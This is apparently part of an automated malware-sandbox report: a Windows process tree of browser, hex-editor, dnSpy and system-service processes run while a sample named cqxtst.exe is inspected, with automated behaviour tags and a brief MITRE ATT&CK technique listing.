  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10916 /prefetch:1
  2⤵
  PID:6780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10896 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:7084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11184 /prefetch:1
  2⤵
  PID:5696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9744 /prefetch:1
  2⤵
  PID:4784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10840 /prefetch:1
  2⤵
  PID:4356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10844 /prefetch:1
  2⤵
  PID:2300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10784 /prefetch:8
  2⤵
  - NTFS ADS
  PID:6576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2296 /prefetch:1
  2⤵
  PID:4040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=108 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10852 /prefetch:1
  2⤵
  PID:1140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=109 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11152 /prefetch:1
  2⤵
  PID:6252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=110 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10668 /prefetch:1
  2⤵
  PID:3620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=111 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1
  2⤵
  PID:6456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=112 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2596 /prefetch:1
  2⤵
  PID:6196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=11100 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:5472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=11236 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:6344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=115 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10560 /prefetch:1
  2⤵
  PID:1148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=116 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11064 /prefetch:1
  2⤵
  PID:6896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=117 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7884 /prefetch:1
  2⤵
  PID:5460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=118 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11236 /prefetch:1
  2⤵
  PID:6520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=119 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9008 /prefetch:1
  2⤵
  PID:7128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=120 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2996 /prefetch:1
  2⤵
  PID:6952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=121 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10812 /prefetch:1
  2⤵
  PID:7044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=122 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11100 /prefetch:1
  2⤵
  PID:6452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=123 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1288 /prefetch:1
  2⤵
  PID:1240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=124 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11356 /prefetch:1
  2⤵
  PID:6904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=125 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11600 /prefetch:1
  2⤵
  PID:2964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=126 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11576 /prefetch:1
  2⤵
  PID:6284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=127 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11428 /prefetch:1
  2⤵
  PID:4216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=128 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12136 /prefetch:1
  2⤵
  PID:7036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=129 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12380 /prefetch:1
  2⤵
  PID:1904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=130 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11788 /prefetch:1
  2⤵
  PID:4972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=131 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12348 /prefetch:1
  2⤵
  PID:7184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=132 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
  2⤵
  PID:7252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=133 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13008 /prefetch:1
  2⤵
  PID:7460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=134 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1
  2⤵
  PID:7488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=135 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12940 /prefetch:1
  2⤵
  PID:7556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=136 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13552 /prefetch:1
  2⤵
  PID:7660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=137 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11060 /prefetch:1
  2⤵
  PID:8180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=138 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13024 /prefetch:1
  2⤵
  PID:7652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=139 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12972 /prefetch:1
  2⤵
  PID:7896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=140 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13636 /prefetch:1
  2⤵
  PID:400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=141 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2584 /prefetch:1
  2⤵
  PID:3468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=142 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13572 /prefetch:1
  2⤵
  PID:8088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1924,6626938505440682786,1781618049552894778,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=143 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8484 /prefetch:1
  2⤵
  PID:7200

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2832

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4200

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4888

C:\Users\Admin\AppData\Local\Temp\Temp1_HxDSetup.zip\HxDSetup.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_HxDSetup.zip\HxDSetup.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:1324
- C:\Users\Admin\AppData\Local\Temp\is-7K12L.tmp\HxDSetup.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-7K12L.tmp\HxDSetup.tmp" /SL5="$30630,2973524,121344,C:\Users\Admin\AppData\Local\Temp\Temp1_HxDSetup.zip\HxDSetup.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:5444
- - C:\Program Files\HxD\HxD.exe
    "C:\Program Files\HxD\HxD.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:4848
  - - C:\Program Files\HxD\HxD.exe
      "C:\Program Files\HxD\HxD.exe" /chooselang
      4⤵
      Executes dropped EXE
      PID:856

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6624

C:\Users\Admin\Desktop\1\dnSpy.exe
"C:\Users\Admin\Desktop\1\dnSpy.exe" C:\Users\Admin\Desktop\cqxtst.exe
1⤵
PID:6212

C:\Program Files\HxD\HxD.exe
"C:\Program Files\HxD\HxD.exe" C:\Users\Admin\Desktop\cqxtst.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5404

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3420
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f3edcc40,0x7ff8f3edcc4c,0x7ff8f3edcc58
  2⤵
  PID:4052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1784,i,1755862116433492473,9608508560882270192,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1780 /prefetch:2
  2⤵
  PID:5372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2096,i,1755862116433492473,9608508560882270192,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2104 /prefetch:3
  2⤵
  PID:3776
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2176,i,1755862116433492473,9608508560882270192,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2192 /prefetch:8
  2⤵
  PID:6424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3096,i,1755862116433492473,9608508560882270192,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3232 /prefetch:1
  2⤵
  PID:5952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,1755862116433492473,9608508560882270192,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3296 /prefetch:1
  2⤵
  PID:488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4484,i,1755862116433492473,9608508560882270192,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4512 /prefetch:1
  2⤵
  PID:5580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4436,i,1755862116433492473,9608508560882270192,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4784 /prefetch:8
  2⤵
  PID:3272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4408,i,1755862116433492473,9608508560882270192,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4948 /prefetch:8
  2⤵
  PID:344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4852,i,1755862116433492473,9608508560882270192,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4792 /prefetch:8
  2⤵
  PID:5368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4992,i,1755862116433492473,9608508560882270192,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4804 /prefetch:8
  2⤵
  PID:6964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4956,i,1755862116433492473,9608508560882270192,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5040 /prefetch:8
  2⤵
  PID:3480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4796,i,1755862116433492473,9608508560882270192,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5108 /prefetch:8
  2⤵
  PID:3024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5176,i,1755862116433492473,9608508560882270192,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5284 /prefetch:2
  2⤵
  PID:7124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5016,i,1755862116433492473,9608508560882270192,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5412 /prefetch:8
  2⤵
  PID:7124

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:7096

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:5516

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

